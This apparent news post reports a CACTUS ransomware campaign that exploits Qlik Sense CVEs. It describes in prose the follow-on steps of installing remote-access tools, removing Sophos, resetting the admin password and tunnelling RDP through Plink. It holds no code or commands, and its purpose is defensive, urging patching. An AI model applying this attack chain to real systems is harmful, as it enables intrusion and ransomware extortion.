The emergence of a new CACTUS ransomware campaign has shaken the cybersecurity realm, targeting vulnerabilities discovered in Qlik Sense. This alarming revelation, observed and disclosed by Arctic Wolf researchers, signifies a pivotal moment in cyber threats as it marks the first instance where assailants leveraging CACTUS ransomware have exploited vulnerabilities within Qlik Sense for initial access. These vulnerabilities, including CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365, have been utilized in a series of orchestrated attacks by threat actors, underscoring the critical need for swift patching and bolstering defenses against such vulnerabilities. The attack methodology following the exploitation involves a series of troubling steps.
Following the successful exploitation of the flaws, the assailants abuse Qlik Sense Scheduler service, enabling them to spawn processes to download additional tools. These tools, such as ManageEngine Unified Endpoint Management and Security, AnyDesk, and Plink, are employed to establish persistence and facilitate remote control. The attackers go to great lengths, observed by Arctic Wolf, by not only deploying CACTUS ransomware but also executing actions like uninstalling Sophos software, altering the administrator account’s password, and constructing an RDP tunnel via Plink, thereby showcasing the severity and sophistication of the attack chain. Amidst this escalating ransomware landscape, the evolving sophistication of attacks, the underground economy’s role in enabling wide-scale attacks, and the persisting challenges faced by governments in combating ransomware remain evident.
This instance of CACTUS ransomware exploiting Qlik Sense vulnerabilities is a stark reminder of the urgency to address and fortify the weaknesses in software systems and emphasizes the imperative need for a proactive and robust cybersecurity posture to safeguard organizations against such insidious threats.